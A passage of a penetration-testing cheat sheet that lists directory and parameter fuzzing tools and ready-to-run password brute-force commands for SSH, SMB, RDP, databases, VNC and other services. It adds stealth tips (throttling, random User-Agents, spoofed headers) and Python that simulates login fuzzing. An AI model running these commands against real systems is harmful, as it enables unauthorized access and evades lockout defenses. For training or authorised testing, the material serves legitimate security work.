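    stored = werkzeug_hash("hunter2")                       # constructed sample
    print(crack(stored, ["123456", "hunter2", "letmein"]))
    print(*to_hashcat(stored))
```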

## 03. Fuzzing Basic

```bash
## ------------------| Extension lists (pick one for -e/-x; every extension multiplies the request count)
php,html,txt
php,html,txt,bak,tar,zip
php,html,txt,bak,tar,zip,aspx,asp
php,html,txt,bak,tar,zip,aspx,asp,jsp,js
php,html,txt,bak,tar,zip,aspx,asp,jsp,js,htm,exe
```

### 03.1 [ffuf](https://github.com/ffuf/ffuf#example-usage)

{% hint style="danger" %}
Caution: when you send a body with -d, ffuf does not reliably add a **Content-Type** header for you (older releases never did), so form-based username/password enumeration can fail silently. Set it explicitly with -H "Content-Type: application/x-www-form-urlencoded", replay a raw request with -request, or use wfuzz.
{% endhint %}

```bash
## ------------------| General options
-H                  Header "Name: Value", separated by colon. Multiple -H flags are accepted.
-X                  HTTP method to use
-b                  Cookie data "NAME1=VALUE1; NAME2=VALUE2" for copy as curl functionality.
-d                  POST data
-c                  Colorize output. (default: false)
-r                  Follow redirects (default: false)
-u                  Target URL
-v                  Verbose output, printing full URL 
-e                  Comma separated list of extensions. (.php,.txt,.html)
-x                  Proxy URL (SOCKS5 or HTTP). For example: http://127.0.0.1:8080 or socks5://127.0.0.1:8080
-ic                 Ignore wordlist comments (default: false)
-sni                Target TLS SNI, does not support FUZZ keyword
-rate               Rate of requests per second (default: 0)
-request            File containing the raw http request (Like burp request)
-request-proto      Protocol to use along with raw request (default: http)
-timeout            HTTP request timeout in seconds. (default: 10)
-ignore-body        Do not fetch the response content. (default: false)
-recursion          Scan recursively. Only FUZZ keyword is supported, and URL (-u) has to end in it. (default: false)
-recursion-depth    Maximum recursion depth. (default: 0)
-recursion-strategy Recursion strategy: "default" for a redirect based, and "greedy" to recurse on all matches (default: default)     
-replay-proxy       Replay matched requests using this proxy.

## ------------------|  Filter options
-fc    Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl    Filter by amount of lines in response. Comma separated list of line counts and ranges
-fr    Filter regexp or keyword
-fs    Filter HTTP response size. Comma separated list of sizes and ranges
-ft    Filter by number of milliseconds to the first response byte, either greater or less than. EG: >100 or <100   
-fw    Filter by amount of words in response. Comma separated list of word counts and ranges

## ------------------| Matcher options
-mc    Match HTTP status codes, or "all" for everything. (default: 200,204,301,302,307,401,403,405)
-ml    Match amount of lines in response
-mr    Match regexp
-ms    Match HTTP response size
-mt    Match how many milliseconds to the first response byte, either greater or less than. EG: >100 or <100   
-mw    Match amount of words in response
```

* Stealth Mode

```bash
## ------------------| Throttle Requests
ffuf -c -ic -t 1 -p 2 -u https://h4rithd.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
ffuf -c -ic -t 1 -p 5-10 -u https://h4rithd.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
### -t 1 → single thread (low profile)
### -p 2 → delay of 2 seconds between requests

## ------------------| Randomize User-Agent & Headers
wget https://gist.githubusercontent.com/pzb/b4b6f57144aea7827ae4/raw/cf847b76a142955b1410c8bcef3aabe221a63db1/user-agents.txt
ffuf -c -ic -t 1 -p 2 -H "User-Agent: $(shuf -n 1 user-agents.txt)" -u https://h4rithd.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
ffuf -c -ic -t 1 -p 2 -H "Referer: https://h4rithd.com" -H "X-Forwarded-For: 192.168.1.10" -u https://h4rithd.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
```

* Best Usage

```bash
## ------------------| Directory Fuzz
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://h4rithd.com/FUZZ | tee ffuf.out    

## ------------------| With Extensions
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://h4rithd.com/FUZZ -e .php,.txt,.html | tee ffuf.out    

## ------------------| Fuzz with numbers
ffuf -c -ic -w <(seq 0 2000) -u https://example.org/FUZZ | tee ffuf.out    

## ------------------| Subdomain Fuzz
ffuf -w hosts.txt -u https://example.org/ -H "Host: FUZZ" -mc 200
```

* Multi-wordlist Operation Mode

```bash
## ------------------| Cluster Bomb (Default)
### Tests all combinations of payloads across multiple parameters
### user1:pass1, user1:pass2, user2:pass1, user2:pass2
ffuf -c -ic -mode clusterbomb -w user.txt:user -w password.txt:pass -u https://example.org/user/pass

## ------------------| Pitchfork
### Matches corresponding payloads to multiple parameters in parallel. 
### user1:pass1, user2:pass2
ffuf -c -ic -mode pitchfork -w user.txt:user -w password.txt:pass -u https://example.org/user/pass

## ------------------| Sniper
### Tests one parameter at a time with single payloads
### payload1:default, payload2:default
ffuf -c -ic -mode sniper -w user.txt -u https://example.org/FUZZ/FUZZ
```
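The matcher/filter flags and the multi-wordlist modes are easier to reason about as code. The Python below is an added example (not ffuf's code) of the same loop run against a constructed, in-process login handler that returns one identical page for every failure: clusterbomb and pitchfork payload generation, matchers applied before filters, and a miniature -ac that derives filters from a bogus probe. Keyword handling is plain substring replacement, as in ffuf, which is why the example uses USER/PASS rather than user/pass (pass would match inside password=).

```python
import itertools
import re
from dataclasses import dataclass


@dataclass
class Response:
    status: int
    body: str

    @property
    def size(self):    # -fs/-ms compare the body length in bytes
        return len(self.body.encode())

    @property
    def words(self):   # -fw/-mw: whitespace-separated tokens
        return len(self.body.split())

    @property
    def lines(self):   # -fl/-ml: newline count
        return self.body.count("\n")


DEFAULT_MC = {200, 204, 301, 302, 307, 401, 403, 405}    # ffuf's default -mc set


def payload_sets(mode, wordlists):
    """wordlists maps keyword -> list. clusterbomb = every combination; pitchfork = position-wise pairs."""
    keys = list(wordlists)
    if mode == "clusterbomb":
        combos = itertools.product(*(wordlists[k] for k in keys))
    elif mode == "pitchfork":
        combos = zip(*(wordlists[k] for k in keys))       # stops at the shortest list
    else:
        raise ValueError(f"unknown mode {mode!r}")
    for combo in combos:
        yield dict(zip(keys, combo))


def substitute(template, values):
    """Plain substring replacement, as ffuf treats keywords: choose keywords that cannot occur elsewhere."""
    out = {}
    for field, text in template.items():
        for keyword, value in values.items():
            text = text.replace(keyword, value)
        out[field] = text
    return out


def fuzz(template, wordlists, send, mode="clusterbomb", mc=DEFAULT_MC, fs=(), fw=(), fl=(), fr=None):
    """Matchers admit a response, then filters drop it; a hit is (payload values, response)."""
    hits = []
    for values in payload_sets(mode, wordlists):
        resp = send(substitute(template, values))
        if resp.status not in mc:
            continue
        if resp.size in fs or resp.words in fw or resp.lines in fl:
            continue
        if fr and re.search(fr, resp.body):
            continue
        hits.append((values, resp))
    return hits


def autocalibrate(template, wordlists, send):
    """-ac in miniature: send an obviously bogus payload and filter whatever the failure looks like.
    Calibrates on size and word count only: a line-count filter on a one-line app would hide the
    success page too, which is exactly the false negative auto-calibration can produce."""
    bogus = {k: f"ffufac-{k.lower()}-9f1c" for k in wordlists}
    baseline = send(substitute(template, bogus))
    return {"fs": {baseline.size}, "fw": {baseline.words}}


# Constructed stand-in for a login endpoint: the same 200 page for every failure, a 302 on success.
VALID_LOGINS = {("admin", "Password1")}


def fake_login(req):
    params = dict(p.split("=", 1) for p in req["data"].split("&"))
    if (params["username"], params["password"]) in VALID_LOGINS:
        return Response(302, "Redirecting to /dashboard\n")
    return Response(200, "<html><body>Invalid username or password.</body></html>\n")


if __name__ == "__main__":
    template = {"url": "http://target/login.php", "data": "username=USER&password=PASS"}
    lists = {"USER": ["admin", "bob"], "PASS": ["123456", "Password1"]}
    for values, resp in fuzz(template, lists, fake_login, **autocalibrate(template, lists, fake_login)):
        print(values, resp.status)
```

Without any filter every attempt "matches" because 200 is in the default -mc set; that is the trap the hint above warns about, and why a login fuzz is driven by -fr/-fs (or -ac) rather than by status code.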

* Fuzz with POST data

```bash
## ------------------| application/json
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/json" -d '{"name": "FUZZ", "anotherkey": "anothervalue"}' -fr "error"

## ------------------| application/x-www-form-urlencoded (no backslash before &: inside double quotes the shell keeps it and the server would receive name=admin\&password=...)
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "name=admin&password=FUZZ" -fr "error"

## ------------------| From a raw (Burp) request file; put FUZZ where the payload goes, the headers in the file are sent as-is
ffuf -w entries.txt -request-proto http -request getUsers.req -fr "error"
```

### 03.2 [wfuzz](https://github.com/xmendez/wfuzz)

```bash
## ------------------| General Options
-u url                    : Specify a URL for the request.
-w wordlist               : Specify a wordlist file (alias for -z file,wordlist).
-V alltype                : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method                 : Specify an HTTP method for the request, ie. HEAD or FUZZ
-e <type>                 : List of available encoders/payloads/iterators/printers/scripts
-c                        : Output with colors
-v                        : Verbose information.
-b cookie                 : Specify a cookie for the requests. Repeat option for various cookies.
-d postdata               : Use post data (ex: "id=FUZZ&catalogue=1")
-H header                 : Use header (ex:"Cookie:id=1312321&user=FUZZ"). Repeat option for various headers.
--basic/ntlm/digest auth  : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
-f filename,printer       : Store results in the output file using the specified printer (raw printer if omitted).
-o printer                : Show results using the specified printer.
-t N                      : Specify the number of concurrent connections (10 default)
-s N                      : Specify time delay between requests (0 default)
-R depth                  : Recursive path discovery being depth the maximum recursion level.
-D depth                  : Maximum link depth level.
-L,--follow               : Follow HTTP redirections
-Z                        : Scan mode (Connection errors will be ignored).
--req-delay N             : Sets the maximum time in seconds the request is allowed to take (CURLOPT_TIMEOUT). Default 90.
--conn-delay N            : Sets the maximum time in seconds the connection phase to the server to take (CURLOPT_CONNECTTIMEOUT). Default 90.

## ------------------| Scripts
-A, --AA, --AAA           : Alias for -v -c and --script=default,verbose,discover respectively
--no-cache                : Disable plugins cache. Every request will be scanned.
--script=                 : Equivalent to --script=default
--script=<plugins>        : Runs script's scan. <plugins> is a comma separated list of plugin-files or plugin-categories
--script-help=<plugins>   : Show help about scripts.
--script-args n1=v1,...   : Provide arguments to scripts. ie. --script-args grep.regex="<A href=\"(.*?)\">"

## ------------------| Payloads
-m iterator               : Specify an iterator for combining payloads (product by default)
-z payload                : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
                            A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
                            Encoders category can be used. ie. url
                            Use help as a payload to show payload plugin's details (you can filter using --slice)
--zP <params>             : Arguments for the specified payload (it must be preceded by -z or -w).
--zD <default>            : Default parameter for the specified payload (it must be preceded by -z or -w).
--zE <encoder>            : Encoder for the specified payload (it must be preceded by -z or -w).
--slice <filter>          : Filter payload's elements using the specified expression. It must be preceded by -z.

## ------------------|  Filter options
--filter-help             : Filter language specification
--hc/hl/hw/hh N[,N]+      : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+      : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex             : Show/hide responses with the specified regex within the content
--filter <filter>         : Show/hide responses using the specified filter expression (Use BBB for taking values from baseline)
--prefilter <filter>      : Filter items before fuzzing using the specified expression. Repeat for concatenating filters.
```

* Find valid usernames | POST data

```bash
wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=test123" --hs "No account found with that username" http://10.10.10.97/login.php | tee usernames.txt    
```

* Other commands

```bash
## ------------------| Range payload (here: every port 1-65535 in the URL)
wfuzz -c -z range,1-65535 http://127.0.0.1:FUZZ

## ------------------| Fuzz with two parameters (-m zip pairs the payloads position-wise; the default iterator is product)
wfuzz -c -m zip -z range,1-65535 -w wordlist.txt http://127.0.0.1:FUZZ/FUZ2Z

## ------------------| With encoders
### List available encoders
wfuzz -e encoders
### Apply an encoder to each wordlist entry (uri_hex encodes every character as %XX; urlencode only the unsafe ones)
wfuzz -c -w wordlist.txt,uri_hex -u http://127.0.0.1/FUZZ
```

### 03.3 [Gobuster](https://github.com/OJ/gobuster)

```
## ------------------| General Options
-z, --no-progress                   Don't display progress
-o, --output string                 Output file to write results to (defaults to stdout)
-q, --quiet                         Don't print the banner and other noise
-t, --threads int                   Number of concurrent threads (default 10)
    --delay duration                Time each thread waits between requests (e.g. 1500ms)
-v, --verbose                       Verbose output (errors)
-w, --wordlist string               Path to the wordlist

-f, --add-slash                     Append / to each request
-c, --cookies string                Cookies to use for the requests
-e, --expanded                      Expanded mode, print full URLs
-x, --extensions string             File extension(s) to search for
-r, --follow-redirect               Follow redirects
-H, --headers stringArray           Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
-k, --no-tls-validation             Skip TLS certificate verification
-n, --no-status                     Don't print status codes
-p, --password string               Password for Basic Auth
-P, --proxy string                  Proxy to use for requests [http(s)://host:port][socks5://127.0.0.1:1080]
-s, --status-codes string           Positive status codes (will be overwritten with status-codes-blacklist if set) (default "200,204,301,302,307,401,403")    
-b, --status-codes-blacklist string Negative status codes (will override status-codes if set)
    --timeout duration              HTTP Timeout (default 10s)
-u, --url string                    The target URL
-a, --useragent string              Set the User-Agent string (default "gobuster/3.1.0")
-U, --username string               Username for Basic Auth
-d, --discover-backup               Upon finding a file search for backup files
    --wildcard                      Force continued operation when wildcard found
```

* Best Usage

```bash
gobuster dir -e -f -t 20 -k -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt -o gobuster.out -u https://mysite.com/
```

* **DNS** mode

```bash
gobuster dns -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-dns.out -d google.com 
```

* **VHOST** Mode

```bash
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-vhost.out -u https://mysite.com 
```

* Search backup files

```bash
gobuster dir -e -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -d -o gobuster-backups.out -u https://mysite.com/
```

* Fuzzing Mode

```
gobuster fuzz -u "https://example.com/?FUZZ=test" -w parameter-names.txt
```

### 03.4 [DirSearch](https://github.com/maurosoria/dirsearch)

```bash
## ------------------| General Options
-u    Target URL
-e    Extension list separated by commas (Example: php,asp)
-X    Exclude extension list separated by commas (Example: asp,jsp)
-f    Add extensions to every wordlist entry. By default dirsearch only replaces the %EXT% keyword with extensions     
-t    Number of threads
-r    Brute-force recursively
-i    Include status codes, separated by commas, support ranges (Example: 200,300-399)
-x    Exclude status codes, separated by commas, support ranges (Example: 301,500-599)
-q    Quiet mode
-m    HTTP method (default: GET)
-d    HTTP request data
-H    HTTP request header, support multiple flags (Example:  -H 'Referer: example.com')
-F    Follow HTTP redirects
-s    Delay between requests

-o    Output file
--format    Report format (Available: simple, plain, json, xml,md, csv, html)

--proxy          Proxy URL, support HTTP and SOCKS proxies (Example: localhost:8080, socks5://localhost:8088)
--timeout        Connection timeout
--cookie         Choose a cookie for each request
--user-agent     Choose a User-Agent for each request
--random-agent   Choose a random User-Agent for each request
--full-url       Full URLs in the output (enabled automatically in quiet mode)
--no-color       No colored output
--exclude-sizes  Exclude responses by sizes, separated by commas (Example: 123B,4KB)
--exclude-texts  Exclude responses by texts, separated by commas (Example: 'Not found', 'Error')

-U    Uppercase wordlist
-L    Lowercase wordlist
-C    Capital wordlist

--raw=FILE    Load raw HTTP request from file (use `--scheme` flag to set the scheme)
```

* Best Usage

```bash
dirsearch -r -f -o `pwd`/dirsearch.out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -e php,html,txt -u http://example.org/
```

* Name the output file after the target host (handy on HTB)

```bash
url=http://nineveh.htb/department
dirsearch -f -o `pwd`/$(echo $url | cut -d '/' -f 3).out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u $url -e php  
```

### 03.5 [feroxbuster](https://github.com/epi052/feroxbuster)

```bash
## ------------------| General Options
-u                    The target URL
-a                    Sets the User-Agent (default: feroxbuster/2.7.0)
-A                    Use a random User-Agent
-f                    Append / to each request's URL
-H                    Specify HTTP headers to be used in each request (ex: -H Header:val -H 'stuff: things')
-m                    Which HTTP request method(s) should be sent (default: GET)
-Q                    Request's URL query parameters (ex: -Q token=stuff -Q secret=key)
-x                    File extension(s) to search for (ex: -x php -x pdf js)
-k                    Disables TLS certificate validation in the client
-r                    Allow client to follow redirects
-T                    Number of seconds before a client's request times out (default: 7)
--data                Request's Body; can read data from a file if input starts with an @ (ex: @post.bin)
-b, --cookies         Specify HTTP cookies to be used in each request (ex: -b stuff=things)
--resume-from         State file from which to resume a partially complete scan
--burp                Set --proxy to http://127.0.0.1:8080 and set --insecure to true
--burp-replay         Set --replay-proxy to http://127.0.0.1:8080 and set --insecure to true
--smart               Set --extract-links, --auto-tune, --collect-words, and --collect-backups to true
--thorough            Use the same settings as --smart and set --collect-extensions to true
--force-recursion     Force recursion attempts on all 'found' endpoints (still respects recursion depth)

## ------------------| Response filters
-C                    Filter out status codes (deny list) (ex: -C 200 -C 401)
-N                    Filter out messages of a particular line count (ex: -N 20 -N 31,30)
-s                    Status Codes to include (allow list) (default: 200 204 301 302 307 308 401 403 405)
-S                    Filter out messages of a particular size (ex: -S 5120 -S 4927,1970)
-W                    Filter out messages of a particular word count (ex: -W 312 -W 91,82)
-X                    Filter out messages via regular expression matching on the response's body (ex: -X '^ignore me$')

## ------------------| Dynamic collection settings
-B                    Automatically request likely backup extensions for "found" urls
-E                    Automatically discover extensions and add them to --extensions (unless they're in --dont-collect)
-g                    Automatically discover important words from within responses and add them to the wordlist
-I                    File extension(s) to Ignore while collecting extensions (only used with --collect-extensions)

## ------------------| Output settings
--no-state            Disable state output file (*.state)
--silent              Only print URLs + turn off logging (good for piping a list of urls to other commands)
-o                    Output file to write results to (use w/ --json for JSON entries)
-q                    Hide progress bars and banner (good for tmux windows w/ notifications)
-v                    Increase verbosity level (use -vv or more for greater effect. [CAUTION] 4 -v's is probably too much)
```

* Best Usage

```bash
feroxbuster -k -f -A -u <URL>
```

### 03.6 [Arjun](https://github.com/s0md3v/Arjun)

```bash
## ------------------| Setup
apt-get install arjun
pip3 install arjun

## ------------------| Usage
arjun -u https://api.example.com/endpoint
arjun -u https://api.example.com/endpoint -m POST
arjun -u https://api.example.com/endpoint -m JSON --include='{"root":{"a":"b",$arjun$}}'
```

## 04. Brute-force Basic

### 04.1 HTTP

* Common useful flags

```bash
hydra -u -f -t 10 -w 30 -L users.txt -P pass.txt 192.168.1.69 http-post-form "/login.php:user=^USER^&pass=^PASS^:Bad login" -o hydra-http-post-attack.txt

 # Host   : 192.168.1.69
 # Module : http-post-form / https-post-form / http-get-form / http-get (basic auth)
 # URI    : /login.php
 # Form parameters  : user=^USER^&pass=^PASS^
 # Failure string   : Bad login   (F= is the default; use S=<string> to match the success page instead)
 # -L : users.txt
 # -l : single username
 # -P : pass.txt
 # -t : parallel tasks (threads)
 # -w : max wait time (seconds) for a response
 # -S : Perform an SSL connect [https]
 # -s : port, if the service is not on its default port
 # -o : Output file
 # -f : exit when a login/pass pair is found
 # -R : Restore a previous aborted/crashed session
 # -I : Ignore an existing restore file
 # -u : Loop around users, not passwords (effective! implied with -x); spreads attempts across accounts, which is what keeps you under lockout thresholds

 ## To go through a proxy: export HYDRA_PROXY_HTTP=http://127.0.0.1:8080
```

* https-post-form

```bash
hydra -S -u -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password"       
```

* http-get (basic auth) / Tomcat

```bash
hydra -u -f -l admin -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt 10.10.10.157 http-get "/monitoring"   
```

* With headers

```bash
hydra 192.168.1.69 http-post-form "/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo" \
-L users.txt -P pass.txt -t 10 -w 1 -o hydra-http-post-attack.txt
 # in this case we specify that the cookie should be page/cookie
 # cookies can be specified with C=
 # and we also added an header with H= 
 # this header is called X-Foo and has as value Foo
```

### 04.2 SSH

```bash
## ------------------| Using Hydra (keep -t low: sshd's MaxStartups throttles unauthenticated connections and fail2ban bans quickly)
hydra -v -V -u -f -L users.txt -p "Password!" -t 2 $ip ssh
hydra -v -V -u -f -l root -P /usr/share/wordlists/rockyou.txt -t 2 $ip ssh
hydra -v -V -u -f -L users.txt -P /usr/share/wordlists/rockyou.txt -t 2 $ip ssh

## -v        Verbose mode
## -L        User List
## -P        Password List
## -V        Show login+pass for each attempt
## -u        Loop around users, not passwords (effective! implied with -x)
## -o        Write found login/password pairs to FILE instead of stdout
## -t        Run TASKS number of connects in parallel per target (default: 16)
## -f / -F   Exit when a login/pass pair is found (-M: -f per host, -F global)
```

```bash
## ------------------| Using NCrack
ncrack -v -p 22 --user root -P /usr/share/wordlists/rockyou.txt <IP> -T5

## ------------------| Using Patator
patator ssh_login host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0  
patator ssh_login -x ignore:fgrep='failed' host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0          

## ------------------| Using Medusa
medusa -h <IP> -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -M ssh
```

### 04.3 SMB

```bash
## ------------------| Using Nmap
nmap --script smb-brute -p 445 <IP>

## ------------------| Using CrackMapExec
crackmapexec smb <IP> -u users.txt -p /usr/share/wordlists/rockyou.txt --continue-on-success
crackmapexec smb <IP> -u Hazard -p /usr/share/wordlists/rockyou.txt --shares

## ------------------| Using Hydra
hydra -u -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
```

### 04.4 RDP

```bash
## ------------------| Using Hydra
hydra -t 1 -V -f -u -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
hydra -V -f -u -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt rdp://<IP>         

## ------------------| Using NCrack
ncrack -vv --user <UserName> -P /usr/share/wordlists/rockyou.txt rdp://<IP>

## ------------------| Using Crowbar
crowbar -b rdp -s <IP>/CIDR -u <USER> -C /usr/share/wordlists/rockyou.txt
crowbar -b rdp -s <IP>/CIDR -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -C /usr/share/wordlists/rockyou.txt
```

### 04.5 LDAP

```bash
## ------------------| Nmap (Basic)
nmap --script ldap-brute -p 389 <IP>

## ------------------| Using Hydra
hydra -V -f -u -L users.txt -P /usr/share/wordlists/rockyou.txt <IP> ldap2

## ------------------| Using CrackMapExec
crackmapexec ldap <IP> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt  
```

### 04.6 FTP

```bash
## ------------------| Using Hydra
hydra -u -f -l root -P /usr/share/wordlists/rockyou.txt [-t 32] <IP> ftp

## ------------------| Using Ncrack
ncrack -p 21 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]

## ------------------| Using Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M ftp
```

### 04.7 SNMP

```bash
## ------------------| Using Nmap
nmap -sU --script snmp-brute <IP> [--script-args snmp-brute.communitiesdb=<wordlist> ]    

## ------------------| Using Hydra
hydra -u -f -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP> snmp

## ------------------| Using MSF
use auxiliary/scanner/snmp/snmp_login

## ------------------| Using onesixtyone 
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>
```

### 04.8 SMTP

```bash
hydra -u -f -V -l <username> -P /usr/share/wordlists/rockyou.txt <IP> smtp
### If you need ssl: use S
hydra -u -f -S -v -V -l <username> -P /usr/share/wordlists/rockyou.txt -s 587 <IP> 
```

### 04.9 WinRM

```bash
## ------------------| Using CrackMapExec
crackmapexec winrm <IP> -d <Domain Name> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt  
```

### 04.10 MySQL

```bash
## ------------------| Using Hydra
hydra -u -f -l root -P /usr/share/wordlists/rockyou.txt -s 3306 <IP> mysql
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> mysql
```

### 04.11 MSSQL

```bash
## ------------------| Using Hydra
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt <IP> mssql

## ------------------| Using Medusa
medusa -h <IP> -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -M mssql

## ------------------| Using Nmap
### Use the NetBIOS name of the machine as domain
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt,ms-sql-brute.brute-windows-accounts <IP>   

## ------------------| Using Metasploit
## If you have a domain, set it and use USE_WINDOWS_AUTHENT
use auxiliary/scanner/mssql/mssql_login
```

### 04.12 MongoDB

```bash
## ------------------| Using Nmap
nmap -sV --script mongodb-brute -n -p 27017 <IP>

## ------------------| Using Metasploit
use auxiliary/scanner/mongodb/mongodb_login
```

### 04.13 OracleSQL

```bash
## ------------------| Using Nmap
sudo nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
### Offline hash brute (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):
sudo nmap -p 1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n <IP>
 
## ------------------| Using Patator
pip3 install cx_Oracle --upgrade
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

## ------------------| Using ODAT (Oracle Database Attacking Tool)
./odat.py passwordguesser -s <SERVER_IP> -d <SID>
./odat.py passwordguesser -s <SERVER_IP> -p <PORT> --accounts-file accounts_multiple.txt

## ------------------| Using Metasploit
use admin/oracle/oracle_login
## or
use scanner/oracle/oracle_login
set RHOSTS <IP>
set RPORT 1521
set SID <SID>
```

### 04.15 PostgreSQL

```bash
## ------------------| Using Hydra 
hydra -u -f -L usernames.txt -P /usr/share/wordlists/rockyou.txt <IP> postgres

## ------------------| Using Medusa
medusa -h <IP> -U usernames.txt -P /usr/share/wordlists/rockyou.txt -M postgres

## ------------------| Using Ncrack
ncrack -v -U usernames.txt -P /usr/share/wordlists/rockyou.txt <IP>:5432

## ------------------| Using Patator
patator pgsql_login host=<IP> user=FILE0 0=usernames.txt password=FILE1 1=/usr/share/wordlists/rockyou.txt

## ------------------| Using Metasploit
use auxiliary/scanner/postgres/postgres_login

## ------------------| Using Nmap
nmap -sV --script pgsql-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 5432 <IP>
```

### 04.16 Telnet

```bash
## ------------------| Using Hydra
hydra -u -f -l <username> -P /usr/share/wordlists/rockyou.txt telnet://targetname

## ------------------| Using Ncrack
ncrack -p 23 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]

## ------------------| Using Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M telnet
```

### 04.17 VNC

```bash
## ------------------| Using Hydra
hydra -u -f -vV -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> vnc

## ------------------| Using Medusa
medusa -h <IP> -u root -P /usr/share/wordlists/rockyou.txt -M vnc

## ------------------| Using Ncrack
ncrack -V --user root -P /usr/share/wordlists/rockyou.txt <IP>:5900

## ------------------| Using Patator 
patator vnc_login host=<IP> password=FILE0 0=/usr/share/wordlists/rockyou.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0

## ------------------| Using Metasploit
use auxiliary/scanner/vnc/vnc_login

## ------------------| Using Nmap
nmap -sV --script vnc-brute --script-args userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt -p 5900 <IP>
```

### 04.18 IRC

```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p <PORT> <IP>
```

### 04.19 ISCSI

```bash
nmap -sV --script iscsi-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 3260 <IP>
```

### 04.20 PPTP

```bash
cat /usr/share/wordlists/rockyou.txt | thc-pptp-bruter -u <Username> <IP>
```

### 04.21 Redis

```bash
## ------------------| Using Nmap
nmap --script redis-brute -p 6379 <IP>

## ------------------| Using Hydra
hydra -u -f -P /usr/share/wordlists/rockyou.txt <IP> redis

## ------------------| Using MSF
use auxiliary/scanner/redis/redis_login
```

### 04.22 Rexec

```bash
hydra -u -f -v -V -l <username> -P /usr/share/wordlists/rockyou.txt rexec://<Victim-IP>
```

### 04.23 Rlogin

```bash
hydra -v -V -u -f -l <username> -P /usr/share/wordlists/rockyou.txt rlogin://<Victim-IP>
```

### 04.24 [OWA](https://github.com/byt3bl33d3r/SprayingToolkit)

```bash
## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt

## ------------------| Bruteforce
